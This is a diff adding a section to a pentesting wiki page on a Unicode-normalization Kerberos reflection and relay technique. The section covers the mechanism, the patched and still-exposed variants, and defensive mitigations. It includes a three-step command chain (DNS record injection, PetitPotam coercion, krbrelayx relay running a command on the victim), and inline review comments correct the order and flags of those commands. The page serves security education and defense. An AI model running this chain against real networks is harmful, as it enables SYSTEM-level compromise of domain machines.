@@ -253,6 +253,61 @@ For detailed info about this attack check:
4. **Ticket source not already used:** you win the race before the real packet hits or block it entirely; otherwise the server’s replay cache fires Event 4649.
5. You need to somehow be able to perform a **MitM in the communication** maybe being part of the DNSAmins group to modify the DNS of the domain or being able to change the HOST file of the victim.

### Unicode-normalization Kerberos reflection (2025-2026)

Synacktiv documented a **new Kerberos coercion/relay primitive** that bypassed the first SMB reflection mitigations by abusing **inconsistent Unicode normalization** across Windows DNS, Kerberos/SPN lookup, and SMB ticket acceptance.

- The attacker needs a way to **register AD-integrated DNS records** and **coerce machine authentication** (`PetitPotam`, DFSCoerce, etc.).
- The crafted target name must be:
- **Different enough** from the victim hostname/FQDN that `DnsCache` does **not** treat it as "self", so a DNS query is emitted.
- **Equivalent enough** during DC-side SPN lookup that the TGS request resolves to the **real machine account SPN**.
- This was achieved by combining:
- a **Unicode hostname lookalike** such as replacing `R` in `SRV1` with a Unicode equivalent so `CompareStringW(..., NORM_IGNORECASE)` no longer returns equal on the client side
- **Unicode dot equivalents** in the FQDN so the DC-side SPN search key still collides with the victim FQDN SPN set

Why it works:

- `DnsCache` self-name checks use `CompareStringW` with only **`NORM_IGNORECASE`**.
- SPN lookups in AD ultimately depend on **ESE/NTDS search keys** derived from `LCMapStringEx(..., 0x31403)` (`LCMAP_SORTKEY`, `NORM_IGNORECASE`, `NORM_IGNOREKANATYPE`, `NORM_IGNORENONSPACE`, `NORM_IGNOREWIDTH`, `SORT_STRINGSORT`).
- Therefore, two strings can be **different for client-side self-comparison** but still **collide during SPN lookup** on the DC.
- SMB then accepts the relayed AP-REQ as long as the service ticket decrypts under the same machine account key and the local-auth checks are otherwise satisfied.

Practical constraints and workflow:

1. A pure hostname variant tends to fail because **LDAP/DNS uniqueness checks** can hit the same normalized collision and reject the record as already existing.
2. The practical workaround is to register a **crafted FQDN** whose DNS label passes uniqueness checks but whose **constructed SPN** still collides with the victim machine SPNs.
3. Coerce the victim to authenticate to that crafted name, receive the **Kerberos AP-REQ** on the relay box, and relay it to a service on the victim or another service bound to the same machine account.
4. Some relay tooling may need a **small patch** to stop enforcing strict ASCII/hostname equality on the relayed target name because the ticket `sname` can contain Unicode.

Representative chain:

```bash
# 1. Register crafted ADIDNS record pointing to attacker
dnstool.py -u 'DOMAIN\\user' -p 'Passw0rd!' -r '<unicode-fqdn>' -d <attacker-ip> <dc>

# 2. Coerce machine auth to the crafted name
PetitPotam.py -u user -p 'Passw0rd!' '<unicode-fqdn>' <victim-fqdn>

# 3. Relay the Kerberos AP-REQ
krbrelayx.py -t smb://<victim-fqdn> -c whoami
```

Impact and adaptations:

- **Pre-October 2025 SMB reflection**: this yielded **authenticated SYSTEM RCE** from a standard domain user by reflecting the victim's Kerberos auth back to its own SMB service.
- **After CVE-2025-58726**: SMB added a **local-source-IP requirement** for loopback-auth sessions, which killed the remote SMB reflection path.
- **LPE variant (CVE-2026-26128)**: if you already have code execution on the victim, use a **local forwarder / reverse SOCKS** so the final SMB session originates from a **local address** while still relaying the coerced AP-REQ. This converts the primitive into **SYSTEM local privilege escalation**.
- **Other protocols still matter**: SMB-specific hardening does **not** kill Kerberos relay as a class. HTTP services without integrity / CBT remain strong targets, notably:
- **AD CS Web Enrollment** (`http://<ca>/certsrv/certfnsh.asp`) to obtain a machine certificate
- **SCCM AdminService** to perform privileged SCCM actions
- likely any service that accepts Kerberos and does **not** enforce signing, EPA, or channel binding

Defensive notes:

- **Loopback SMB signing** is now the important default mitigation. Newer systems enforce signing for local SMB connections through `HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\RequireSecuritySignatureForLoopback`.
- Treat **ADIDNS write access** as a relay primitive, not just a DNS issue.
- For web targets, disable legacy HTTP enrollment when possible and enforce **EPA / CBT / signing** wherever the protocol supports it.

### Kerberos Relay Steps

- 3.1 **Recon the host**
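Review bot: in the "Representative chain" block the coercion (step 2) is issued before the relay listener is started (step 3); krbrelayx.py has to be bound on 445 when PetitPotam fires or the coerced Kerberos AP-REQ has nowhere to land, so either swap steps 2 and 3 or say that step 3 runs first in a second terminal. Two smaller problems in the same block: `dnstool.py -u 'DOMAIN\\user' ...` sits inside single quotes, so bash hands the tool a literal double backslash; write `'DOMAIN\user'`. And dnstool.py's default action is `query`, so creating the record needs `--action add`, e.g. `dnstool.py -u 'DOMAIN\user' -p 'Passw0rd!' -r '<unicode-fqdn>' -d <attacker-ip> --action add <dc>`; PetitPotam.py is likewise normally given `-d <domain>` next to `-u`/`-p`. Separately, the defensive note on `HKLM\...\LanmanServer\Parameters\RequireSecuritySignatureForLoopback` should cite where that value is documented: none of the references added in this PR covers it, so the value name cannot be checked against the listed sources. Pre-existing nit in the context above: "DNSAmins" should read "DnsAdmins".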
@@ -351,6 +406,9 @@ You now own **NT AUTHORITY\SYSTEM**.
- [Microsoft – WSUS deprecation announcement](https://techcommunity.microsoft.com/blog/windows-itpro-blog/windows-server-update-services-wsus-deprecation/4250436)
- [RelayKing v1.0](https://github.com/depthsecurity/RelayKing-Depth)
- [Depth Security – Introducing RelayKing: Relay to Royalty](https://www.depthsecurity.com/blog/introducing-relayking-relay-to-royalty/)
- [Synacktiv - Bypassing Windows authentication reflection mitigations for SYSTEM shells - Part 2](https://www.synacktiv.com/en/publications/bypassing-windows-authentication-reflection-mitigations-for-system-shells-part.html)
- [Microsoft Learn - LCMapStringEx function](https://learn.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-lcmapstringex)
- [Microsoft Learn - CompareStringW function](https://learn.microsoft.com/en-us/windows/win32/api/stringapiset/nf-stringapiset-comparestringw)
- [Semperis - Exploiting Ghost SPNs and Kerberos Reflection for SMB Server Privilege Elevation](https://www.semperis.com/blog/exploiting-ghost-spns-and-kerberos-reflection-for-smb-server-privilege-elevation/)

{{#include ../../banners/hacktricks-training.md}}
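Review bot: the Synacktiv entry's title says "Part 2" but its URL ends in `...-for-system-shells-part.html`, which looks truncated; verify the link resolves before merging, and since the new section covers the whole 2025-2026 story (the pre-October 2025 SMB reflection as well as the later LPE variant), Part 1 is worth citing alongside it. Style nit: the existing entries separate publisher and title with an en dash (`Microsoft – WSUS deprecation announcement`) while the three added entries use a plain hyphen (`Synacktiv - Bypassing ...`); match the existing separator.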